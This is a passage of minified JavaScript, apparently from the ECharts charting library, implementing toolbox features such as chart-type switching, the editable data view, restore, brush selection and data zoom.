E(t.get("type"),function(t){e[t]&&(n[t]=e[t])}),n},e.getDefaultOption=function(t){return{show:!0,type:[],icon:{line:"M4.1,28.9h7.1l9.3-22l7.4,38l9.7-19.7l3,12.8h14.9M4.1,58h51.4",bar:"M6.7,22.9h10V48h-10V22.9zM24.9,13h10v35h-10V13zM43.2,2h10v46h-10V2zM3.1,58h53.7",stack:"M8.2,38.4l-8.4,4.1l30.6,15.3L60,42.5l-8.1-4.1l-21.5,11L8.2,38.4z M51.9,30l-8.1,4.2l-13.4,6.9l-13.9-6.9L8.2,30l-8.4,4.2l8.4,4.2l22.2,11l21.5-11l8.1-4.2L51.9,30z M51.9,21.7l-8.1,4.2L35.7,30l-5.3,2.8L24.9,30l-8.4-4.1l-8.3-4.2l-8.4,4.2L8.2,30l8.3,4.2l13.9,6.9l13.4-6.9l8.1-4.2l8.1-4.1L51.9,21.7zM30.4,2.2L-0.2,17.5l8.4,4.1l8.3,4.2l8.4,4.2l5.5,2.7l5.3-2.7l8.1-4.2l8.1-4.2l8.1-4.1L30.4,2.2z"},title:t.getLocaleModel().get(["toolbox","magicType","title"]),option:{},seriesIndex:{}}},e.prototype.onclick=function(t,e,n){var i=this.model,r=i.get(["seriesIndex",n]);if(OA[n]){var o,a={series:[]};E(PA,function(t){R(t,n)>=0&&E(t,function(t){i.setIconStatus(t,"normal")})}),i.setIconStatus(n,"emphasis"),t.eachComponent({mainType:"series",query:null==r?null:{seriesIndex:r}},function(t){var e=t.subType,r=t.id,o=OA[n](e,r,t,i);o&&(L(o,t.option),a.series.push(o));var s=t.coordinateSystem;if(s&&"cartesian2d"===s.type&&("line"===n||"bar"===n)){var l=s.getAxesByScale("ordinal")[0];if(l){var u=l.dim+"Axis",c=t.getReferringComponents(u,Da).models[0].componentIndex;a[u]=a[u]||[];for(var h=0;h<=c;h++)a[u][c]=a[u][c]||{};a[u][c].boundaryGap="bar"===n}}});var s=n;"stack"===n&&(o=I({stack:i.option.title.tiled,tiled:i.option.title.stack},i.option.title),"emphasis"!==i.get(["iconStatus",n])&&(s="tiled")),e.dispatchAction({type:"changeMagicType",currentType:s,newOption:a,newTitle:o,featureName:"magicType"})}},e}(bA),OA={line:function(t,e,n,i){if("bar"===t)return I({id:e,type:"line",data:n.get("data"),stack:n.get("stack"),markPoint:n.get("markPoint"),markLine:n.get("markLine")},i.get(["option","line"])||{},!0)},bar:function(t,e,n,i){if("line"===t)return I({id:e,type:"bar",data:n.get("data"),stack:n.get("stack"),markPoint:n.get("markPoint"),markLine:n.get("markLine")},i.get(["option","bar"])||{},!0)},stack:function(t,e,n,i){var r=n.get("stack")===AA;if("line"===t||"bar"===t)return i.setIconStatus("stack",r?"normal":"emphasis"),I({id:e,stack:r?"":AA},i.get(["option","stack"])||{},!0)}};sx({type:"changeMagicType",event:"magicTypeChanged",update:"prepareAndUpdate"},function(t,e){e.mergeOption(t.newOption)});var RA=new Array(60).join("-"),NA="\t";function BA(t){return t.replace(/^\s\s*/,"").replace(/\s\s*$/,"")}var zA=new RegExp("[\t]+","g");function EA(t,e){var n=t.split(new RegExp("\n*"+RA+"\n*","g")),i={series:[]};return E(n,function(t,n){if(function(t){if(t.slice(0,t.indexOf("\n")).indexOf(NA)>=0)return!0}(t)){var r=function(t){for(var e=t.split(/\n+/g),n=[],i=V(BA(e.shift()).split(zA),function(t){return{name:t,data:[]}}),r=0;r<e.length;r++){var o=BA(e[r]).split(zA);n.push(o.shift());for(var a=0;a<o.length;a++)i[a]&&(i[a].data[r]=o[a])}return{series:i,categories:n}}(t),o=e[n],a=o.axisDim+"Axis";o&&(i[a]=i[a]||[],i[a][o.axisIndex]={data:r.categories},i.series=i.series.concat(r.series))}else{r=function(t){for(var e=t.split(/\n+/g),n=BA(e.shift()),i=[],r=0;r<e.length;r++){var o=BA(e[r]);if(o){var a=o.split(zA),s="",l=void 0,u=!1;isNaN(a[0])?(u=!0,s=a[0],a=a.slice(1),i[r]={name:s,value:[]},l=i[r].value):l=i[r]=[];for(var c=0;c<a.length;c++)l.push(+a[c]);1===l.length&&(u?i[r].value=l[0]:i[r]=l[0])}}return{name:n,data:i}}(t);i.series.push(r)}}),i}var VA=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.onclick=function(t,e){setTimeout(function(){e.dispatchAction({type:"hideTip"})});var n=e.getDom(),i=this.model;this._dom&&n.removeChild(this._dom);var r=document.createElement("div");r.style.cssText="position:absolute;top:0;bottom:0;left:0;right:0;padding:5px",r.style.backgroundColor=i.get("backgroundColor")||Cf.color.neutral00;var o=document.createElement("h4"),a=i.get("lang")||[];o.innerHTML=a[0]||i.get("title"),o.style.cssText="margin:10px 20px",o.style.color=i.get("textColor");var s=document.createElement("div"),l=document.createElement("textarea");s.style.cssText="overflow:auto";var u=i.get("optionToContent"),c=i.get("contentToOption"),h=function(t){var e,n,i,r=function(t){var e={},n=[],i=[];return t.eachRawSeries(function(t){var r,o=t.coordinateSystem;if(!o||"cartesian2d"!==o.type&&"polar"!==o.type)n.push(t);else{var a=o.getBaseAxis();if("category"===a.type){var s=(r=a).dim+"_"+r.index;e[s]||(e[s]={categoryAxis:a,valueAxis:o.getOtherAxis(a),series:[]},i.push({axisDim:a.dim,axisIndex:a.index})),e[s].series.push(t)}else n.push(t)}}),{seriesGroupByCategoryAxis:e,other:n,meta:i}}(t);return{value:H([(n=r.seriesGroupByCategoryAxis,i=[],E(n,function(t,e){var n=t.categoryAxis,r=t.valueAxis.dim,o=[" "].concat(V(t.series,function(t){return t.name})),a=[n.model.getCategories()];E(t.series,function(t){var e=t.getRawData();a.push(t.getRawData().mapArray(e.mapDimension(r),function(t){return t}))});for(var s=[o.join(NA)],l=0;l<a[0].length;l++){for(var u=[],c=0;c<a.length;c++)u.push(a[c][l]);s.push(u.join(NA))}i.push(s.join("\n"))}),i.join("\n\n"+RA+"\n\n")),(e=r.other,V(e,function(t){var e=t.getRawData(),n=[t.name],i=[];return e.each(e.dimensions,function(){for(var t=arguments.length,r=arguments[t-1],o=e.getName(r),a=0;a<t-1;a++)i[a]=arguments[a];n.push((o?o+NA:"")+i.join(NA))}),n.join("\n")}).join("\n\n"+RA+"\n\n"))],function(t){return!!t.replace(/[\n\t\s]/g,"")}).join("\n\n"+RA+"\n\n"),meta:r.meta}}(t);if(X(u)){var p=u(e.getOption());j(p)?s.innerHTML=p:tt(p)&&s.appendChild(p)}else{l.readOnly=i.get("readOnly");var d=l.style;d.cssText="display:block;width:100%;height:100%;font-family:monospace;font-size:14px;line-height:1.6rem;resize:none;box-sizing:border-box;outline:none",d.color=i.get("textColor"),d.borderColor=i.get("textareaBorderColor"),d.backgroundColor=i.get("textareaColor"),l.value=h.value,s.appendChild(l)}var f=h.meta,g=document.createElement("div");g.style.cssText="position:absolute;bottom:5px;left:0;right:0";var v="float:right;margin-right:20px;border:none;cursor:pointer;padding:2px 5px;font-size:12px;border-radius:3px",y=document.createElement("div"),m=document.createElement("div");v+=";background-color:"+i.get("buttonColor"),v+=";color:"+i.get("buttonTextColor");var _=this;function x(){n.removeChild(r),_._dom=null}fe(y,"click",x),fe(m,"click",function(){if(null==c&&null!=u||null!=c&&null==u)x();else{var t;try{t=X(c)?c(s,e.getOption()):EA(l.value,f)}catch(t){throw x(),new Error("Data view format error "+t)}t&&e.dispatchAction({type:"changeDataView",newOption:t}),x()}}),y.innerHTML=a[1],m.innerHTML=a[2],m.style.cssText=y.style.cssText=v,!i.get("readOnly")&&g.appendChild(m),g.appendChild(y),r.appendChild(o),r.appendChild(s),r.appendChild(g),s.style.height=n.clientHeight-80+"px",n.appendChild(r),this._dom=r},e.prototype.dispose=function(t,e){this._dom&&e.getDom().removeChild(this._dom)},e.getDefaultOption=function(t){return{show:!0,readOnly:!1,optionToContent:null,contentToOption:null,icon:"M17.5,17.3H33 M17.5,17.3H33 M45.4,29.5h-28 M11.5,2v56H51V14.8L38.4,2H11.5z M38.4,2.2v12.7H51 M45.4,41.7h-28",title:t.getLocaleModel().get(["toolbox","dataView","title"]),lang:t.getLocaleModel().get(["toolbox","dataView","lang"]),backgroundColor:Cf.color.background,textColor:Cf.color.primary,textareaColor:Cf.color.background,textareaBorderColor:Cf.color.border,buttonColor:Cf.color.accent50,buttonTextColor:Cf.color.neutral00}},e}(bA);function FA(t,e){return V(t,function(t,n){var i=e&&e[n];if($(i)&&!Y(i)){$(t)&&!Y(t)||(t={value:t});var r=null!=i.name&&null==t.name;return t=L(t,i),r&&delete t.name,t}return t})}sx({type:"changeDataView",event:"dataViewChanged",update:"prepareAndUpdate"},function(t,e){var n=[];E(t.newOption.series,function(t){var i=e.getSeriesByName(t.name)[0];if(i){var r=i.get("data");n.push({name:t.name,data:FA(t.data,r)})}else n.push(A({type:"scatter"},t))}),e.mergeOption(L({series:n},t.newOption))});var HA=E,GA=Ta();function WA(t){var e=GA(t);return e.snapshots||(e.snapshots=[{}]),e.snapshots}var UA=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.onclick=function(t,e){!function(t){GA(t).snapshots=null}(t),e.dispatchAction({type:"restore",from:this.uid})},e.getDefaultOption=function(t){return{show:!0,icon:"M3.8,33.4 M47,18.9h9.8V8.7 M56.3,20.1 C52.1,9,40.5,0.6,26.8,2.1C12.6,3.7,1.6,16.2,2.1,30.6 M13,41.1H3.1v10.2 M3.7,39.9c4.2,11.1,15.8,19.5,29.5,18 c14.2-1.6,25.2-14.1,24.7-28.5",title:t.getLocaleModel().get(["toolbox","restore","title"])}},e}(bA);sx({type:"restore",event:"restore",update:"prepareAndUpdate"},function(t,e){e.resetOption("recreate")});var ZA=Ta();function YA(t,e){return!!ZA(t)[e]}sx({type:"takeGlobalCursor",event:"globalCursorTaken",update:"update"},St);var XA=!0,jA=Math.min,qA=Math.max,KA=Math.pow,$A="globalPan",QA={w:[0,0],e:[0,1],n:[1,0],s:[1,1]},JA={w:"ew",e:"ew",n:"ns",s:"ns",ne:"nesw",sw:"nesw",nw:"nwse",se:"nwse"},tP={brushStyle:{lineWidth:2,stroke:Cf.color.backgroundTint,fill:Cf.color.borderTint},transformable:!0,brushMode:"single",removeOnClick:!1},eP=0,nP=function(t){function e(e){var n=t.call(this)||this;return n._track=[],n._covers=[],n._handlers={},n._zr=e,n.group=new ho,n._uid="brushController_"+eP++,E(DP,function(t,e){this._handlers[e]=U(t,this)},n),n}return n(e,t),e.prototype.enableBrush=function(t){return this._brushType&&this._doDisableBrush(),t.brushType&&this._doEnableBrush(t),this},e.prototype._doEnableBrush=function(t){var e=this._zr;this._enableGlobalPan||function(t,e,n){ZA(t)[e]=n}(e,$A,this._uid),E(this._handlers,function(t,n){e.on(n,t)}),this._brushType=t.brushType,this._brushOption=I(C(tP),t,!0)},e.prototype._doDisableBrush=function(){var t=this._zr;!function(t,e,n){var i=ZA(t);i[e]===n&&(i[e]=null)}(t,$A,this._uid),E(this._handlers,function(e,n){t.off(n,e)}),this._brushType=this._brushOption=null},e.prototype.setPanels=function(t){if(t&&t.length){var e=this._panels={};E(t,function(t){e[t.panelId]=C(t)})}else this._panels=null;return this},e.prototype.mount=function(t){t=t||{},this._enableGlobalPan=t.enableGlobalPan;var e=this.group;return this._zr.add(e),e.attr({x:t.x||0,y:t.y||0,rotation:t.rotation||0,scaleX:t.scaleX||1,scaleY:t.scaleY||1}),this._transform=e.getLocalTransform(),this},e.prototype.updateCovers=function(t){t=V(t,function(t){return I(C(tP),t,!0)});var e=this._covers,n=this._covers=[],i=this,r=this._creatingCover;return new Sx(e,t,function(t,e){return o(t.__brushOption,e)},o).add(a).update(a).remove(function(t){e[t]!==r&&i.group.remove(e[t])}).execute(),this;function o(t,e){return(null!=t.id?t.id:"\0-brush-index-"+e)+"-"+t.brushType}function a(o,a){var s=t[o];if(null!=a&&e[a]===r)n[o]=e[a];else{var l=n[o]=null!=a?(e[a].__brushOption=s,e[a]):rP(i,iP(i,s));sP(i,l)}}},e.prototype.unmount=function(){return this.enableBrush(!1),hP(this),this._zr.remove(this.group),this},e.prototype.dispose=function(){this.unmount(),this.off()},e}(Kt);function iP(t,e){var n=PP[e.brushType].createCover(t,e);return n.__brushOption=e,aP(n,e),t.group.add(n),n}function rP(t,e){var n=lP(e);return n.endCreating&&(n.endCreating(t,e),aP(e,e.__brushOption)),e}function oP(t,e){var n=e.__brushOption;lP(e).updateCoverShape(t,e,n.range,n)}function aP(t,e){var n=e.z;null==n&&(n=1e4),t.traverse(function(t){t.z=n,t.z2=n})}function sP(t,e){lP(e).updateCommon(t,e),oP(t,e)}function lP(t){return PP[t.__brushOption.brushType]}function uP(t,e,n){var i,r=t._panels;if(!r)return XA;var o=t._transform;return E(r,function(t){t.isTargetByCursor(e,n,o)&&(i=t)}),i}function cP(t,e){var n=t._panels;if(!n)return XA;var i=e.__brushOption.panelId;return null!=i?n[i]:XA}function hP(t){var e=t._covers,n=e.length;return E(e,function(e){t.group.remove(e)},t),e.length=0,!!n}function pP(t,e){var n=V(t._covers,function(t){var e=t.__brushOption,n=C(e.range);return{brushType:e.brushType,panelId:e.panelId,range:n}});t.trigger("brush",{areas:n,isEnd:!!e.isEnd,removeOnClick:!!e.removeOnClick})}function dP(t){var e=t.length-1;return e<0&&(e=0),[t[0],t[e]]}function fP(t,e,n,i){var r=new ho;return r.add(new jl({name:"main",style:mP(n),silent:!0,draggable:!0,cursor:"move",drift:Z(bP,t,e,r,["n","s","w","e"]),ondragend:Z(pP,e,{isEnd:!0})})),E(i,function(n){r.add(new jl({name:n.join(""),style:{opacity:0},draggable:!0,silent:!0,invisible:!0,drift:Z(bP,t,e,r,n),ondragend:Z(pP,e,{isEnd:!0})}))}),r}function gP(t,e,n,i){var r=i.brushStyle.lineWidth||0,o=qA(r,6),a=n[0][0],s=n[1][0],l=a-r/2,u=s-r/2,c=n[0][1],h=n[1][1],p=c-o+r/2,d=h-o+r/2,f=c-a,g=h-s,v=f+r,y=g+r;yP(t,e,"main",a,s,f,g),i.transformable&&(yP(t,e,"w",l,u,o,y),yP(t,e,"e",p,u,o,y),yP(t,e,"n",l,u,v,o),yP(t,e,"s",l,d,v,o),yP(t,e,"nw",l,u,o,o),yP(t,e,"ne",p,u,o,o),yP(t,e,"sw",l,d,o,o),yP(t,e,"se",p,d,o,o))}function vP(t,e){var n=e.__brushOption,i=n.transformable,r=e.childAt(0);r.useStyle(mP(n)),r.attr({silent:!i,cursor:i?"move":"default"}),E([["w"],["e"],["n"],["s"],["s","e"],["s","w"],["n","e"],["n","w"]],function(n){var r=e.childOfName(n.join("")),o=1===n.length?xP(t,n[0]):function(t,e){var n=[xP(t,e[0]),xP(t,e[1])];return("e"===n[0]||"w"===n[0])&&n.reverse(),n.join("")}(t,n);r&&r.attr({silent:!i,invisible:!i,cursor:i?JA[o]+"-resize":null})})}function yP(t,e,n,i,r,o,a){var s=e.childOfName(n);s&&s.setShape(function(t){var e=jA(t[0][0],t[1][0]),n=jA(t[0][1],t[1][1]),i=qA(t[0][0],t[1][0]),r=qA(t[0][1],t[1][1]);return{x:e,y:n,width:i-e,height:r-n}}(MP(t,e,[[i,r],[i+o,r+a]])))}function mP(t){return L({strokeNoScale:!0},t.brushStyle)}function _P(t,e,n,i){var r=[jA(t,n),jA(e,i)],o=[qA(t,n),qA(e,i)];return[[r[0],o[0]],[r[1],o[1]]]}function xP(t,e){var n=ap({w:"left",e:"right",n:"top",s:"bottom"}[e],function(t){return rp(t.group)}(t));return{left:"w",right:"e",top:"n",bottom:"s"}[n]}function bP(t,e,n,i,r,o){var a=n.__brushOption,s=t.toRectRange(a.range),l=SP(e,r,o);E(i,function(t){var e=QA[t];s[e[0]][e[1]]+=l[e[0]]}),a.range=t.fromRectRange(_P(s[0][0],s[1][0],s[0][1],s[1][1])),sP(e,n),pP(e,{isEnd:!1})}function wP(t,e,n,i){var r=e.__brushOption.range,o=SP(t,n,i);E(r,function(t){t[0]+=o[0],t[1]+=o[1]}),sP(t,e),pP(t,{isEnd:!1})}function SP(t,e,n){var i=t.group,r=i.transformCoordToLocal(e,n),o=i.transformCoordToLocal(0,0);return[r[0]-o[0],r[1]-o[1]]}function MP(t,e,n){var i=cP(t,e);return i&&i!==XA?i.clipPath(n,t._transform):C(n)}function TP(t){var e=t.event;e.preventDefault&&e.preventDefault()}function kP(t,e,n){return t.childOfName("main").contain(e,n)}function CP(t,e,n,i){var r,o=t._creatingCover,a=t._creatingPanel,s=t._brushOption;if(t._track.push(n.slice()),function(t){var e=t._track;if(!e.length)return!1;var n=e[e.length-1],i=e[0],r=n[0]-i[0],o=n[1]-i[1];return KA(r*r+o*o,.5)>6}(t)||o){if(a&&!o){"single"===s.brushMode&&hP(t);var l=C(s);l.brushType=IP(l.brushType,a),l.panelId=a===XA?null:a.panelId,o=t._creatingCover=iP(t,l),t._covers.push(o)}if(o){var u=PP[IP(t._brushType,a)];o.__brushOption.range=u.getCreatingRange(MP(t,o,t._track)),i&&(rP(t,o),u.updateCommon(t,o)),oP(t,o),r={isEnd:i}}}else i&&"single"===s.brushMode&&s.removeOnClick&&uP(t,e,n)&&hP(t)&&(r={isEnd:i,removeOnClick:!0});return r}function IP(t,e){return"auto"===t?e.defaultBrushType:t}var DP={mousedown:function(t){if(this._dragging)AP(this,t);else if(!t.target||!t.target.draggable){TP(t);var e=this.group.transformCoordToLocal(t.offsetX,t.offsetY);this._creatingCover=null,(this._creatingPanel=uP(this,t,e))&&(this._dragging=!0,this._track=[e.slice()])}},mousemove:function(t){var e=t.offsetX,n=t.offsetY,i=this.group.transformCoordToLocal(e,n);if(function(t,e,n){if(t._brushType&&!function(t,e,n){var i=t._zr;return e<0||e>i.getWidth()||n<0||n>i.getHeight()}(t,e.offsetX,e.offsetY)){var i=t._zr,r=t._covers,o=uP(t,e,n);if(!t._dragging)for(var a=0;a<r.length;a++){var s=r[a].__brushOption;if(o&&(o===XA||s.panelId===o.panelId)&&PP[s.brushType].contain(r[a],n[0],n[1]))return}o&&i.setCursorStyle("crosshair")}}(this,t,i),this._dragging){TP(t);var r=CP(this,t,i,!1);r&&pP(this,r)}},mouseup:function(t){AP(this,t)}};function AP(t,e){if(t._dragging){TP(e);var n=e.offsetX,i=e.offsetY,r=t.group.transformCoordToLocal(n,i),o=CP(t,e,r,!0);t._dragging=!1,t._track=[],t._creatingCover=null,o&&pP(t,o)}}var PP={lineX:LP(0),lineY:LP(1),rect:{createCover:function(t,e){function n(t){return t}return fP({toRectRange:n,fromRectRange:n},t,e,[["w"],["e"],["n"],["s"],["s","e"],["s","w"],["n","e"],["n","w"]])},getCreatingRange:function(t){var e=dP(t);return _P(e[1][0],e[1][1],e[0][0],e[0][1])},updateCoverShape:function(t,e,n,i){gP(t,e,n,i)},updateCommon:vP,contain:kP},polygon:{createCover:function(t,e){var n=new ho;return n.add(new lh({name:"main",style:mP(e),silent:!0})),n},getCreatingRange:function(t){return t},endCreating:function(t,e){e.remove(e.childAt(0)),e.add(new ah({name:"main",draggable:!0,drift:Z(wP,t,e),ondragend:Z(pP,t,{isEnd:!0})}))},updateCoverShape:function(t,e,n,i){e.childAt(0).setShape({points:MP(t,e,n)})},updateCommon:vP,contain:kP}};function LP(t){return{createCover:function(e,n){return fP({toRectRange:function(e){var n=[e,[0,100]];return t&&n.reverse(),n},fromRectRange:function(e){return e[t]}},e,n,[[["w"],["e"]],[["n"],["s"]]][t])},getCreatingRange:function(e){var n=dP(e);return[jA(n[0][t],n[1][t]),qA(n[0][t],n[1][t])]},updateCoverShape:function(e,n,i,r){var o,a=cP(e,n);if(a!==XA&&a.getLinearBrushOtherExtent)o=a.getLinearBrushOtherExtent(t);else{var s=e._zr;o=[0,[s.getWidth(),s.getHeight()][1-t]]}var l=[i,o];t&&l.reverse(),gP(e,n,l,r)},updateCommon:vP,contain:kP}}var OP={axisPointer:1,tooltip:1,brush:1};function RP(t,e,n){var i=e.getComponentByElement(t.topTarget);if(!i||i===n||OP.hasOwnProperty(i.mainType))return!1;var r=i.coordinateSystem;if(!r||r.model===n)return!1;var o=Mp(i),a=Mp(n);return!((o.zlevel-a.zlevel||o.z-a.z)<=0)}function NP(t){return t=EP(t),function(e){return up(e,t)}}function BP(t,e){return t=EP(t),function(n){var i=null!=e?e:n,r=i?t.width:t.height,o=i?t.x:t.y;return[o,o+(r||0)]}}function zP(t,e,n){var i=EP(t);return function(t,r){return i.contain(r[0],r[1])&&!RP(t,e,n)}}function EP(t){return Ue.create(t)}!function(t){function e(e,n,i){var r=t.call(this)||this;r.type="view",r.dimensions=["x","y"];var o=r;o.invertY=e,o.lgCt=n,o.lgGeo=i;var a=o.trans=[];return a[0]=Nr(),a[1]=Nr(),a[2]=Nr(),o.mtRaw=[1,0,0,1,0,0],o.mtRawInv=[1,0,0,1,0,0],o.mtOverall=[1,0,0,1,0,0],o.mtOverallInv=[1,0,0,1,0,0],o.zoom=1,r}n(e,t),e.prototype.getBoundingRect=function(){return FP(null,this)},e.prototype.getViewRect=function(){return function(t,e){return Xe(t||Ze(),e.viewRect)}(null,this)},e.prototype.getRoamTransform=function(){return Rr(this.trans[1])},e.prototype.dataToPoint=function(t,e,n){var i=e?this.mtRaw:this.mtOverall;return n=n||[],i?Ut(n,t,i):It(n,t)},e.prototype.pointToData=function(t,e,n){n=n||[];var i=this.mtOverallInv;return i?Ut(n,t,i):It(n,t)},e.prototype.convertToPixel=function(t,e,n){var i=HP(e);return i===this?i.dataToPoint(n):null},e.prototype.convertFromPixel=function(t,e,n){var i=HP(e);return i===this?i.pointToData(n):null},e.prototype.containPoint=function(t){return Xe(VP,this.dataRect),qe(VP,VP,this.mtOverall),Ke(VP,t[0],t[1])},e.dimensions=["x","y"]}(Or);var VP=Ze();function FP(t,e){return Xe(t||Ze(),e.dataRect)}Ze();function HP(t){var e=t.seriesModel;return e?e.coordinateSystem:null}var GP=["grid","xAxis","yAxis","geo","graph","polar","radiusAxis","angleAxis","bmap"],WP=function(){function t(t,e,n){var i=this;this._targetInfoList=[];var r=ZP(e,t);E(YP,function(t,e){(!n||!n.include||R(n.include,e)>=0)&&t(r,i._targetInfoList)})}return t.prototype.setOutputRanges=function(t,e){return this.matchOutputRanges(t,e,function(t,e,n){if((t.coordRanges||(t.coordRanges=[])).push(e),!t.coordRange){t.coordRange=e;var i=qP[t.brushType](0,n,e);t.__rangeOffset={offset:$P[t.brushType](i.values,t.range,[1,1]),xyMinMax:i.xyMinMax}}}),t},t.prototype.matchOutputRanges=function(t,e,n){E(t,function(t){var i=this.findTargetInfo(t,e);i&&!0!==i&&E(i.coordSyses,function(i){var r=qP[t.brushType](1,i,t.range,!0);n(t,r.values,i,e)})},this)},t.prototype.setInputRanges=function(t,e){E(t,function(t){var n,i,r,o,a,s=this.findTargetInfo(t,e);if(t.range=t.range||[],s&&!0!==s){t.panelId=s.panelId;var l=qP[t.brushType](0,s.coordSys,t.coordRange),u=t.__rangeOffset;t.range=u?$P[t.brushType](l.values,u.offset,(n=l.xyMinMax,i=u.xyMinMax,r=JP(n),o=JP(i),a=[r[0]/o[0],r[1]/o[1]],isNaN(a[0])&&(a[0]=1),isNaN(a[1])&&(a[1]=1),a)):l.values}},this)},t.prototype.makePanelOpts=function(t,e){return V(this._targetInfoList,function(n){var i=n.getPanelRect();return{panelId:n.panelId,defaultBrushType:e?e(n):null,clipPath:NP(i),isTargetByCursor:zP(i,t,n.coordSysModel),getLinearBrushOtherExtent:BP(i)}})},t.prototype.controlSeries=function(t,e,n){var i=this.findTargetInfo(t,n);return!0===i||i&&R(i.coordSyses,e.coordinateSystem)>=0},t.prototype.findTargetInfo=function(t,e){for(var n=this._targetInfoList,i=ZP(e,t),r=0;r<n.length;r++){var o=n[r],a=t.panelId;if(a){if(o.panelId===a)return o}else for(var s=0;s<XP.length;s++)if(XP[s](i,o))return o}return!0},t}();function UP(t){return t[0]>t[1]&&t.reverse(),t}function ZP(t,e){return Ca(t,e,{includeMainTypes:GP})}var YP={grid:function(t,e){var n=t.xAxisModels,i=t.yAxisModels,r=t.gridModels,o=mt(),a={},s={};(n||i||r)&&(E(n,function(t){var e=t.axis.grid.model;o.set(e.id,e),a[e.id]=!0}),E(i,function(t){var e=t.axis.grid.model;o.set(e.id,e),s[e.id]=!0}),E(r,function(t){o.set(t.id,t),a[t.id]=!0,s[t.id]=!0}),o.each(function(t){var r=t.coordinateSystem,o=[];E(r.getCartesians(),function(t,e){(R(n,t.getAxis("x").model)>=0||R(i,t.getAxis("y").model)>=0)&&o.push(t)}),e.push({panelId:"grid--"+t.id,gridModel:t,coordSysModel:t,coordSys:o[0],coordSyses:o,getPanelRect:jP.grid,xAxisDeclared:a[t.id],yAxisDeclared:s[t.id]})}))},geo:function(t,e){E(t.geoModels,function(t){var n=t.coordinateSystem;e.push({panelId:"geo--"+t.id,geoModel:t,coordSysModel:t,coordSys:n,coordSyses:[n],getPanelRect:jP.geo})})}},XP=[function(t,e){var n=t.xAxisModel,i=t.yAxisModel,r=t.gridModel;return!r&&n&&(r=n.axis.grid.model),!r&&i&&(r=i.axis.grid.model),r&&r===e.gridModel},function(t,e){var n=t.geoModel;return n&&n===e.geoModel}],jP={grid:function(){return this.coordSys.master.getRect().clone()},geo:function(){var t=this.coordSys.view,e=FP(null,t);return qe(e,e,function(t,e){return Se(t||[],e.mtOverall)}(null,t)),e}},qP={lineX:Z(KP,0),lineY:Z(KP,1),rect:function(t,e,n,i){var r=t?e.pointToData([n[0][0],n[1][0]],i):e.dataToPoint([n[0][0],n[1][0]],i),o=t?e.pointToData([n[0][1],n[1][1]],i):e.dataToPoint([n[0][1],n[1][1]],i),a=[UP([r[0],o[0]]),UP([r[1],o[1]])];return{values:a,xyMinMax:a}},polygon:function(t,e,n,i){var r=[[1/0,-1/0],[1/0,-1/0]];return{values:V(n,function(n){var o=t?e.pointToData(n,i):e.dataToPoint(n,i);return r[0][0]=Math.min(r[0][0],o[0]),r[1][0]=Math.min(r[1][0],o[1]),r[0][1]=Math.max(r[0][1],o[0]),r[1][1]=Math.max(r[1][1],o[1]),o}),xyMinMax:r}}};function KP(t,e,n,i){var r=n.getAxis(["x","y"][t]),o=UP(V([0,1],function(t){return e?r.coordToData(r.toLocalCoord(i[t]),!0):r.toGlobalCoord(r.dataToCoord(i[t]))})),a=[];return a[t]=o,a[1-t]=[NaN,NaN],{values:o,xyMinMax:a}}var $P={lineX:Z(QP,0),lineY:Z(QP,1),rect:function(t,e,n){return[[t[0][0]-n[0]*e[0][0],t[0][1]-n[0]*e[0][1]],[t[1][0]-n[1]*e[1][0],t[1][1]-n[1]*e[1][1]]]},polygon:function(t,e,n){return V(t,function(t,i){return[t[0]-n[0]*e[i][0],t[1]-n[1]*e[i][1]]})}};function QP(t,e,n,i){return[e[0]-i[t]*n[0],e[1]-i[t]*n[1]]}function JP(t){return t?[t[0][1]-t[0][0],t[1][1]-t[1][0]]:[NaN,NaN]}var tL,eL,nL=E,iL=pa+"toolbox-dataZoom_",rL={x:"width",y:"height"},oL=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.render=function(t,e,n,i){this._brushController||(this._brushController=new nP(n.getZr()),this._brushController.on("brush",U(this._onBrush,this)).mount()),function(t,e,n,i,r){var o=n._isZoomActive;i&&"takeGlobalCursor"===i.type&&(o="dataZoomSelect"===i.key&&i.dataZoomSelectActive);n._isZoomActive=o,t.setIconStatus("zoom",o?"emphasis":"normal");var a=new WP(sL(t),e,{include:["grid"]}),s=a.makePanelOpts(r,function(t){return t.xAxisDeclared&&!t.yAxisDeclared?"lineX":!t.xAxisDeclared&&t.yAxisDeclared?"lineY":"rect"});n._brushController.setPanels(s).enableBrush(!(!o||!s.length)&&{brushType:"auto",brushStyle:t.getModel("brushStyle").getItemStyle()})}(t,e,this,i,n),function(t,e){t.setIconStatus("back",function(t){return WA(t).length}(e)>1?"emphasis":"normal")}(t,e)},e.prototype.onclick=function(t,e,n){aL[n].call(this)},e.prototype.dispose=function(t,e){this._brushController&&this._brushController.dispose()},e.prototype._onBrush=function(t){var e=t.areas;if(t.isEnd&&e.length){var n={},i=this.ecModel;this._brushController.updateCovers([]),new WP(sL(this.model),i,{include:["grid"]}).matchOutputRanges(e,i,function(t,e,n){if("cartesian2d"===n.type){var i=n.master.getRect().clone(),o=t.brushType;"rect"===o?(r("x",n,i,e[0]),r("y",n,i,e[1])):r({lineX:"x",lineY:"y"}[o],n,i,e)}}),function(t,e){var n=WA(t);HA(e,function(e,i){for(var r=n.length-1;r>=0&&!n[r][i];r--);if(r<0){var o=t.queryComponents({mainType:"dataZoom",subType:"select",id:i})[0];if(o){var a=o.getPercentRange();n[0][i]={dataZoomId:i,start:a[0],end:a[1]}}}}),n.push(e)}(i,n),this._dispatchZoomAction(n)}function r(t,e,r,o){var a=e.getAxis(t),s=a.model,l=function(t,e,n){var i;return n.eachComponent({mainType:"dataZoom",subType:"select"},function(n){n.getAxisModel(t,e.componentIndex)&&(i=n)}),i}(t,s,i),u=l.findRepresentativeAxisProxy(s).getMinMaxSpan(),c=a.scale.getExtent();null==u.minValueSpan&&null==u.maxValueSpan||(o=dA(0,o.slice(),c,0,u.minValueSpan,u.maxValueSpan));var h=Ho(c,r[rL[t]],.5);l&&(n[l.id]={dataZoomId:l.id,startValue:isFinite(h)?zo(o[0],h):o[0],endValue:isFinite(h)?zo(o[1],h):o[1]})}},e.prototype._dispatchZoomAction=function(t){var e=[];nL(t,function(t,n){e.push(C(t))}),e.length&&this.api.dispatchAction({type:"dataZoom",from:this.uid,batch:e})},e.getDefaultOption=function(t){return{show:!0,filterMode:"filter",icon:{zoom:"M0,13.5h26.9 M13.5,26.9V0 M32.1,13.5H58V58H13.5 